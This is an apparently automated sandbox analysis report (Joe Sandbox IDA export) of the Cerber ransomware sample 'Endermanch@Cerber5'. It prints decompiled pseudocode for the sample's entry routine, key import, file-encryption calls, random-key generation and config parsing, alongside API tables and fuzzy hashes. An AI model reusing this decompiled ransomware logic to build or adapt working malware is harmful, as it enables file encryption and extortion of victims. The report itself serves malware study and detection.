					_push(E0040591C(0x40d920, 0x21, 0x44c051f2));
					_push(_a4);
					E00402B9B(__ebx, _t51,  &_v16, __esi);
				}
				asm("sbb edx, [ebp-0xc]");
				return _v12 - _v20;
			}

0x0040aafb
0x0040ab09
0x0040ab0f
0x0040ab10
0x0040ab16
0x0040ab23
0x0040ab2b
0x0040ab3e
0x0040ab4d
0x0040ab53
0x0040ab62
0x0040ab6b
0x0040ab7a
0x0040ab7f
0x0040ab8b
0x0040ab92
0x0040ab99
0x0040ab9a
0x0040abb1
0x0040abb2
0x0040abb5
0x0040abba
0x0040abc6
0x0040abcb

APIs

GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040AB23
StrFormatByteSizeW.SHLWAPI(00000000,00000000,?,00000064), ref: 0040AB4D
StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB62
StrFormatByteSizeW.SHLWAPI(?,00000000,?,00000064), ref: 0040AB7F

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ByteFormatSize$DiskFreeSpace
String ID:
API String ID: 648141005-0
Opcode ID: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
Instruction ID: ed8ce472527b587452f6a98b297226058bf91ab61d3eb22b8839db4c947b5189
Opcode Fuzzy Hash: 776b8ff08538e54e33a170f2f3b8741f3847f5afe882b71b028517029533d5bc
Instruction Fuzzy Hash: D021E576900119BFDF01DF94DD45EEEBB7ABB08300F0049AAB615B6190DB71AA588B51

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD86 Relevance: 6.0, APIs: 4, Instructions: 42encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AD62: CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A

CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
String ID:
API String ID: 1643522540-0
Opcode ID: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
Instruction ID: e707437ec58a6c757e266905c9f68223cccbec67ed6f77b66ad84f0330a91ceb
Opcode Fuzzy Hash: 22e3fde35bc06fe7a1d3690271d50f937b631542d947ca3b8de1cc307d06c3d6
Instruction Fuzzy Hash: 41014671600308BFEF218FA1DD8AA9E7B7EEF04341F008035B901A19A0D7718E64AA24

Uniqueness

Uniqueness Score: -1.00%

Function 00404B6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404B6E(BYTE* __edi, char _a4) {
				intOrPtr _v4;
				int _t5;
				void* _t7;
				BYTE* _t8;
				long* _t9;
				void* _t10;

				_t8 = __edi;
				_t9 = 0;
				_t10 =  *0x42f804 - _t9; // 0x179e438
				if(_t10 == 0) {
					_t7 =  *0x40fa58(0x42f804, 0, 0, 1, 0xf0000040); // executed
					if(_t7 == 0) {
						 *0x42f804 = 0;
					}
				}
				_t1 =  &_a4; // 0x404464
				_t5 = CryptGenRandom( *0x42f804,  *_t1, _t8);
				if(_t5 != 0 || _v4 <= _t9) {
					L6:
					return _t5;
				} else {
					do {
						_t5 = E004063E1(0xff);
						 *(_t9 + _t8) = _t5;
						_t9 = _t9 + 1;
					} while (_t9 < _v4);
					goto L6;
				}
			}

0x00404b6e
0x00404b6f
0x00404b71
0x00404b77
0x00404b87
0x00404b8f
0x00404b91
0x00404b91
0x00404b8f
0x00404b98
0x00404ba2
0x00404baa
0x00404bc7
0x00404bc7
0x00404bb2
0x00404bb2
0x00404bb7
0x00404bbc
0x00404bbf
0x00404bc0
0x00000000
0x00404bb2

APIs

CryptAcquireContextW.ADVAPI32(0042F804,00000000,00000000,00000001,F0000040,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007), ref: 00404B87
CryptGenRandom.ADVAPI32(dD@ ,80C426C8,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007,?,0040B4AF,00000000), ref: 00404BA2

Strings

dD@ , xrefs: 00404B98

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$AcquireContextRandom
String ID: dD@
API String ID: 2163786899-696579481
Opcode ID: 96756b1c2e0829ad038602c9216bb5cdfaf2b38804aa5886356d3b8b8231cfe6
Instruction ID: e2ef947ef44517b9588ee9796fddc0016603c5d158485c66fdcfa932e0cbdc38
Opcode Fuzzy Hash: 96756b1c2e0829ad038602c9216bb5cdfaf2b38804aa5886356d3b8b8231cfe6
Instruction Fuzzy Hash: 44F08270640261AADB316B119E44F5BBFB4AB80B40F80443EBA4861590C238E885C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFFE Relevance: 4.5, APIs: 3, Instructions: 42
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040AFFE(void* __eax, int __edi, intOrPtr _a4, void* _a8, void* _a12) {
				int _v8;
				void* __esi;
				long* _t13;
				signed int _t21;
				int _t25;
				long* _t28;

				_t25 = __edi;
				_t21 = 0; // executed
				_t13 = E0040AF8D(__eax, _a4); // executed
				_t28 = _t13;
				if(_t28 != 0) {
					if(_a12 != 0) {
						memcpy(_a12, _a8, __edi);
					} else {
						_a12 = _a8;
					}
					_v8 = _t25;
					_t21 = _t21 & 0xffffff00 |  *0x40fa50(_t28, _t21, 1, _t21, _a12,  &_v8, _t25) != 0x00000000;
					CryptDestroyKey(_t28);
				}
				return _t21;
			}

0x0040affe
0x0040b009
0x0040b00b
0x0040b010
0x0040b015
0x0040b01a
0x0040b02b
0x0040b01c
0x0040b01f
0x0040b01f
0x0040b03b
0x0040b04c
0x0040b04f
0x0040b04f
0x0040b05a

APIs

Part of subcall function 0040AF8D: memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
Part of subcall function 0040AF8D: CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2

memcpy.NTDLL(?,?,0001A2AC,00000000,?,?,?,0040B07B,?,?,00000000,00000000,00000000,0040128F,0040FDC0,0040FDD4), ref: 0040B02B
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0001A2AC,?,0001A2AC,?,?,?,?,00000000,000000C8), ref: 0040B043
CryptDestroyKey.ADVAPI32(00000000,?,?,?,?,00000000,000000C8), ref: 0040B04F

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$memcpy$DestroyEncryptImport
String ID:
API String ID: 774555595-0
Opcode ID: eed7bca699b7271e2f8133fceda6d266f3483274d5b1aca3eb140505197ca46d
Instruction ID: c796a56940c9369ceff2896823de790180829fd366095f41db376a1457016cc5
Opcode Fuzzy Hash: eed7bca699b7271e2f8133fceda6d266f3483274d5b1aca3eb140505197ca46d
Instruction Fuzzy Hash: 74F06276500259BFDF20AF619C85CDF3BACEF45754B00453AFD21A6250D3758E14DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF8D Relevance: 3.0, APIs: 2, Instructions: 45
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040AF8D(int __esi, void* _a4) {
				long* _v8;
				void _v24;
				int _v28;
				intOrPtr _v32;
				void _v35;
				char _v36;
				char* _t23;
				signed int _t24;
				int _t26;

				_v8 = _v8 & 0x00000000;
				if(E0040AF69() != 0) {
					_t24 = 6;
					memset( &_v35, 0, _t24 << 2);
					asm("stosw");
					asm("stosb");
					_v36 = 0x208;
					_v32 = 0x6801;
					_v28 = __esi;
					memcpy( &_v24, _a4, __esi);
					CryptImportKey( *0x42faf4,  &_v36, 0x1c, 0, 0,  &_v8); // executed
					_t26 = __esi;
					_t23 =  &_v24;
					if(__esi != 0) {
						do {
							 *_t23 = 0;
							_t23 = _t23 + 1;
							_t26 = _t26 - 1;
						} while (_t26 != 0);
					}
				}
				return _v8;
			}

0x0040af93
0x0040af9e
0x0040afa3
0x0040afa9
0x0040afab
0x0040afad
0x0040afb6
0x0040afbc
0x0040afc3
0x0040afc6
0x0040afe2
0x0040afe8
0x0040afea
0x0040aff0
0x0040aff2
0x0040aff2
0x0040aff5
0x0040aff6
0x0040aff6
0x0040aff2
0x0040aff0
0x0040affd

APIs

Part of subcall function 0040AF69: CryptAcquireContextW.ADVAPI32(0042FAF4,00000000,00000000,00000001,F0000000,0040AF9C), ref: 0040AF81

memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$AcquireContextImportmemcpy
String ID:
API String ID: 765176249-0
Opcode ID: 46ecc010d97fa25e3c5be6b2cb8034e01b895c56157c12cbe359982bfb4b8a12
Instruction ID: 3a753eb2b7e9b1c05a6a89d0856bf63f6f9c9ee9a6ed8b67e501f67ceec9ed79
Opcode Fuzzy Hash: 46ecc010d97fa25e3c5be6b2cb8034e01b895c56157c12cbe359982bfb4b8a12
Instruction Fuzzy Hash: A4018471A0020AAAEF10DB94DD45FEF77B8EF44704F100035E900B61D0D7B49A199B95

Uniqueness

Uniqueness Score: -1.00%

Function 004027DD Relevance: 1.7, APIs: 1, Instructions: 229
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004027DD(void* __ecx, signed int __edx, void* __eflags, char _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t22;
				void* _t23;
				void* _t26;
				long* _t28;
				void* _t31;
				intOrPtr _t34;
				intOrPtr _t37;
				signed int _t40;
				signed short _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t55;
				void* _t57;
				signed int _t60;
				void* _t62;
				intOrPtr _t65;
				void* _t74;
				void* _t79;
				intOrPtr _t82;
				void* _t83;
				signed char _t84;
				void* _t88;
				void* _t90;
				signed short _t92;
				signed int _t102;
				long* _t105;
				void* _t113;
				void* _t114;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t102 = __edx;
				_t22 = E0040B53E(__ecx); // executed
				_t125 = _t22;
				if(_t22 == 0) {
					return _t22;
				}
				_t104 =  &E0040D17C;
				_t23 = E00405905( &E0040D17C, 7, 0x80c426c8);
				_t114 = _t113 + 0xc;
				_t83 = E004031AF(_a4, _t125, _t23);
				_t126 = _t83;
				if(_t83 == 0) {
					_t84 = _v16;
					goto L18;
				} else {
					_t47 = E00405905( &E0040D17C, 7, 0x80c426c8);
					_t118 = _t114 + 0xc;
					_t50 = E00403253(E004031AF(_t83, _t126, _t47), _t126);
					_t127 = _t50 | _t102;
					 *0x42f79e = 1;
					if((_t50 | _t102) == 0) {
						 *0x42f79e = 0;
					}
					_t52 = E00405905(0x40d184, 0xb, 0xd51d715e);
					_t119 = _t118 + 0xc;
					_t55 = E00403253(E004031AF(_t83, _t127, _t52), _t127);
					_t128 = _t55 | _t102;
					if((_t55 | _t102) == 0) {
						 *0x42f79c = 0;
						L8:
						_t57 = E00405905(0x40d1a4, 0xe, 0xc05954db);
						_t120 = _t119 + 0xc;
						_t60 = E00403253(E004031AF(_t83, _t130, _t57), _t130);
						_t131 = _t60;
						if(_t60 == 0) {
							_t60 = 0x80;
						}
						 *0x42f7b8 = _t60 << 0x14;
						_t62 = E00405905(0x40d1b4, 7, 0x4d2b3d31);
						_t121 = _t120 + 0xc;
						_t65 = E00403253(E004031AF(_t83, _t131, _t62), _t131);
						 *0x42f7d8 = _t65;
						_t132 = _t65;
						if(_t65 == 0) {
							 *0x42f7d8 = 0x20000;
						}
						 *0x42f7c0 = E00403253(E004031AF(_t83, _t132, E00405905(0x40d1bc, 0xa, 0xe7b760df)), _t132);
						 *0x42f7c4 = _t102;
						 *0x42f7a8 = E00403253(E004031AF(_t83, _t132, E00405905(0x40d1c8, 0xd, 0x2e896a3a)), _t132);
						 *0x42f7ac = _t102;
						_t74 = E00405905(0x40d1d8, 0xc, 0xedfce971);
						_t114 = _t121 + 0x24;
						_t104 = E004031AF(_t83, _t132, _t74);
						_t84 =  <  ? 0x240 : E00403253(_t76, _t132);
						while((_t84 & 0x00000007) != 0) {
							_t84 = _t84 + 1;
							__eflags = _t84;
						}
						L18:
						_v5 = 0;
						_t26 = E004026FE(_t104); // executed
						if(_t26 != 0) {
							 *0x42f79d = 1;
							_v5 = 1;
						} else {
							_t28 = E0040B17E(_a4); // executed
							_t105 = _t28;
							_pop(_t88);
							_t136 = _t105;
							if(_t105 != 0) {
								_v12 = _v12 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_t31 = E0040B472(_t88, _t136, _t84,  &_v12,  &_v16); // executed
								_t137 = _t31;
								if(_t31 != 0) {
									 *0x42f7a0 = _v16;
									_t34 = E0040B283(_t88, _t137, _t105, _v12, 0x42f7a0);
									 *0x42f7b0 = _t34;
									if(_t34 != 0) {
										_t37 = E0040B253(_t88,  *0x43000c,  *0x430004);
										_pop(_t90);
										 *0x42f7bc = _t37;
										if(_t37 != 0) {
											_t40 = E0040B146(_t90, _t37) - 0x0000000b & 0x0000ffff;
											_t92 = _t40 - 0x17;
											if(_t92 >= 0x10) {
												_t92 = 0x10;
											}
											 *0x42f7a4 = _t92;
											_t93 = _t92 & 0x0000ffff;
											_t42 = _t40 -  *0x42f7a4 - 0x17;
											 *0x42f7b4 = _t42;
											 *0x42f794 = (_t42 & 0x0000ffff) + (_t92 & 0x0000ffff) + 0x17;
											_t45 = E00401209();
											 *0x430008 = _t45;
											if(_t45 != 0) {
												E0040AD86(_t93, _t45,  *0x430000, 0x42f7c8);
												_v5 = 1;
											}
										}
									}
									E004054A9(_v12, _t84);
								}
								CryptDestroyKey(_t105);
							}
						}
						return _v5;
					}
					 *0x42f79c = 1;
					_t79 = E00405905(0x40d190, 0x10, 0x155a4e43);
					_t119 = _t119 + 0xc;
					_t82 = E00403253(E004031AF(_t83, _t128, _t79), _t128);
					 *0x42f798 = _t82;
					if(_t82 == 0) {
						L7:
						 *0x42f798 = 2;
						goto L8;
					}
					_t130 = _t82 - 5;
					if(_t82 <= 5) {
						goto L8;
					}
					goto L7;
				}
			}

0x004027dd
0x004027e6
0x004027eb
0x004027ed
0x00402ad6
0x00402ad6
0x004027fb
0x00402801
0x00402806
0x00402812
0x00402815
0x00402817
0x004029ca
0x00000000
0x0040281d
0x00402821
0x00402826
0x00402834
0x00402839
0x0040283b
0x00402842
0x00402844
0x00402844
0x00402857
0x0040285c
0x0040286a
0x0040286f
0x00402871
0x004029b6
0x004028ba
0x004028c6
0x004028cb
0x004028d9
0x004028de
0x004028e0
0x004028e2
0x004028e2
0x004028f6
0x004028fb
0x00402900
0x0040290e
0x00402913
0x00402918
0x0040291a
0x0040291c
0x0040291c
0x00402956
0x0040295b
0x00402985
0x0040298a
0x00402990
0x00402995
0x004029a1
0x004029b1
0x004029c3
0x004029c2
0x004029c2
0x004029c2
0x004029cd
0x004029cd
0x004029d1
0x004029d8
0x00402ac4
0x00402acb
0x004029de
0x004029e1
0x004029e6
0x004029e8
0x004029e9
0x004029eb
0x004029f1
0x004029f5
0x00402a02
0x00402a0a
0x00402a0c
0x00402a1d
0x00402a23
0x00402a2b
0x00402a32
0x00402a40
0x00402a46
0x00402a47
0x00402a4e
0x00402a59
0x00402a5d
0x00402a63
0x00402a67
0x00402a67
0x00402a68
0x00402a75
0x00402a78
0x00402a7b
0x00402a88
0x00402a8d
0x00402a92
0x00402a99
0x00402aa7
0x00402aaf
0x00402aaf
0x00402a99
0x00402a4e
0x00402ab6
0x00402ab6
0x00402abc
0x00402abc
0x004029eb
0x00000000
0x00402acf
0x00402883
0x0040288a
0x0040288f
0x0040289d
0x004028a2
0x004028a9
0x004028b0
0x004028b0
0x00000000
0x004028b0
0x004028ab
0x004028ae
0x00000000
0x00000000
0x00000000
0x004028ae

APIs

Part of subcall function 0040B53E: StrChrW.SHLWAPI(00000000,0000002D,00000000,?,00000000,?,?,00000000), ref: 0040B591
Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(?,00000000,00000001,?,00000000,?,?,00000000), ref: 0040B5AF
Part of subcall function 0040B53E: GetTempPathW.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,?,00000000), ref: 0040B5C0
Part of subcall function 0040B53E: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?), ref: 0040B5CE
Part of subcall function 0040B53E: StrChrW.SHLWAPI(-00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5DA
Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(68f6,-00000002,00000001,?,00000000,?,?,00000000), ref: 0040B5F2
Part of subcall function 0040B53E: StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5FE
Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(4e9a,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B616
Part of subcall function 0040B53E: StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B622
Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(955c,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B638

CryptDestroyKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 00402ABC

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CryptDestroyPathTemplstrcatlstrcmpi
String ID:
API String ID: 74468174-0
Opcode ID: 624e2ffc4e37d3f0dca818b73105c8e9306749f5056d15b30d797cfe2bb4428b
Instruction ID: 61159875388271f52669120d72e273ac9903c895f200c47806f8b7d26bb41935
Opcode Fuzzy Hash: 624e2ffc4e37d3f0dca818b73105c8e9306749f5056d15b30d797cfe2bb4428b
Instruction Fuzzy Hash: A97107B1F003006AD720BFB5AD46B0A3BA89B54358F55547FF408FA2C3EABC89094B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B11B Relevance: 1.5, APIs: 1, Instructions: 12encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0042FAF8,00000000,00000000,00000001,F0000000,0040B260,004029D6,?,00402726,00000000,004029D6,80C426C8,?,00000000), ref: 0040B134

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 93ff10940dc78446d8b252e0d1ce091bdab675856b45d7ea9a61a66c548ef40d
Instruction ID: 7677ceff8f67063ce42918aba9d83e89620582dd31fa1a4ed98665aecb77ad59
Opcode Fuzzy Hash: 93ff10940dc78446d8b252e0d1ce091bdab675856b45d7ea9a61a66c548ef40d
Instruction Fuzzy Hash: 37D00230750351AAE73057209D46F0533615754B55FF1553571657C4D0D6F914C9870D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD62 Relevance: 1.5, APIs: 1, Instructions: 11encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
Instruction ID: 71168021d763e1e7dcbc7070406abf6f585069e42b9707890cf07a7ddbdd7918
Opcode Fuzzy Hash: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
Instruction Fuzzy Hash: 7BC04C70750252AEEF309720AD46F353779A724F01FF04631F90AEA990D2F6688D8A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF69 Relevance: 1.5, APIs: 1, Instructions: 11encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0042FAF4,00000000,00000000,00000001,F0000000,0040AF9C), ref: 0040AF81

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 8d709e34f905b3d1e9b39c812c95413ebbe30c8aa965ca7d14b7af5c535f36fe
Instruction ID: fd4e9b65beb9a6c72a0c5c93a7397172f72b61858c70e9ec66c350d9c8736119
Opcode Fuzzy Hash: 8d709e34f905b3d1e9b39c812c95413ebbe30c8aa965ca7d14b7af5c535f36fe
Instruction Fuzzy Hash: 51C04CB0754252AEEF34A720EF45F313778B304701FF00631BD09E9990D1F658898A1D

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 118
synchronizationthreadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			_entry_() {
				char _v404;
				short _v684;
				void _v890;
				char _v892;
				intOrPtr _v912;
				char* _v916;
				intOrPtr _v928;
				intOrPtr _v948;
				char* _v952;
				void _v976;
				struct tagOFNA _v980;
				char _v984;
				void* __edi;
				void* __esi;
				long _t32;
				void* _t38;
				intOrPtr _t39;
				void* _t43;
				void* _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t66;

				_push(_t61);
				_v984 = 0;
				memset( &_v976, 0, 0x54);
				_v892 = 0;
				_v980 = 0x58;
				memset( &_v890, 0, 0xc8);
				_v952 =  &_v892;
				_v916 =  &_v984;
				_v948 = 0x64;
				_v928 = 0x20;
				_v912 = E004066BB;
				GetOpenFileNameW( &_v980); // executed
				if(_v984 != 0) {
					SetErrorMode(0x8007); // executed
					E00402EFB(_t53, _t54, _t61, 0,  &_v684);
					CreateMutexW(0, 0,  &_v684); // executed
					_t32 = GetLastError();
					__eflags = _t32 - 0xb7;
					if(_t32 == 0xb7) {
						L8:
						ExitProcess( *0x40fc78);
					}
					 *0x42f838 = GetModuleHandleA(0);
					GetModuleFileNameW(0, "C:\Users\engineer\AppData\Local\Temp\Endermanch@Cerber5.exe", 0x104);
					_t62 = E00401270();
					__eflags = _t62;
					if(_t62 == 0) {
						goto L8;
					}
					E00406C8C(_t62); // executed
					_pop(_t56);
					_t38 = E004027DD(_t56, _t60, __eflags, _t62); // executed
					_pop(_t57);
					__eflags = _t38;
					if(_t38 == 0) {
						goto L8;
					}
					_t39 = E00406005(_t57); // executed
					 *0x42fa54 = _t39;
					 *0x42fa58 = _t39;
					__eflags = _t39 - 0x3000;
					if(__eflags >= 0) {
						E0040186A(_t53, _t57, _t60, _t62, __eflags, _t62); // executed
						_pop(_t57);
					}
					 *0x40e00c(0x202,  &_v404); // executed
					 *0x42f834 = CreateEventW(0, 1, 0, 0); // executed
					_t43 = CreateThread(0, 0, 0x406488, 0, 0, 0); // executed
					_t66 = _t43;
					E00406598(_t62, _t57, _t60, _t66, __eflags); // executed
					WaitForSingleObject(_t66, 0xffffffff);
					CloseHandle(_t66);
					CloseHandle( *0x42f834);
					E004082AB(_t53, _t57, _t60, _t62, __eflags, _t62); // executed
					E00403085(__eflags, _t62);
					goto L8;
				}
				return 0;
			}

0x004066fd
0x00406708
0x0040670c
0x0040671b
0x00406726
0x0040672e
0x00406737
0x0040673f
0x0040674b
0x00406753
0x0040675b
0x00406763
0x0040676d
0x0040677c
0x0040678a
0x0040679a
0x004067a0
0x004067a6
0x004067ab
0x00406876
0x0040687e
0x0040687e
0x004067c3
0x004067c8
0x004067d3
0x004067d5
0x004067d7
0x00000000
0x00000000
0x004067de
0x004067e3
0x004067e5
0x004067ea
0x004067eb
0x004067ed
0x00000000
0x00000000
0x004067f3
0x004067f8
0x004067fd
0x00406802
0x00406807
0x0040680a
0x0040680f
0x0040680f
0x0040681d
0x00406838
0x0040683d
0x00406843
0x00406847
0x0040684f
0x00406856
0x00406862
0x00406869
0x00406870
0x00000000
0x00406875
0x00406776

APIs

memset.NTDLL ref: 0040670C
memset.NTDLL ref: 0040672E
GetOpenFileNameW.COMDLG32 ref: 00406763
SetErrorMode.KERNEL32(00008007), ref: 0040677C
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040679A
GetLastError.KERNEL32 ref: 004067A0
GetModuleHandleA.KERNEL32(00000000), ref: 004067B2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,00000104), ref: 004067C8
WSAStartup.WS2_32(00000202,?), ref: 0040681D
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406828
CreateThread.KERNEL32(00000000,00000000,00406488,00000000,00000000,00000000), ref: 0040683D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040684F
CloseHandle.KERNEL32(00000000), ref: 00406856
CloseHandle.KERNEL32 ref: 00406862
ExitProcess.KERNEL32 ref: 0040687E

Strings

, xrefs: 00406753
C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, xrefs: 004067BD
X, xrefs: 00406726
d, xrefs: 0040674B

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

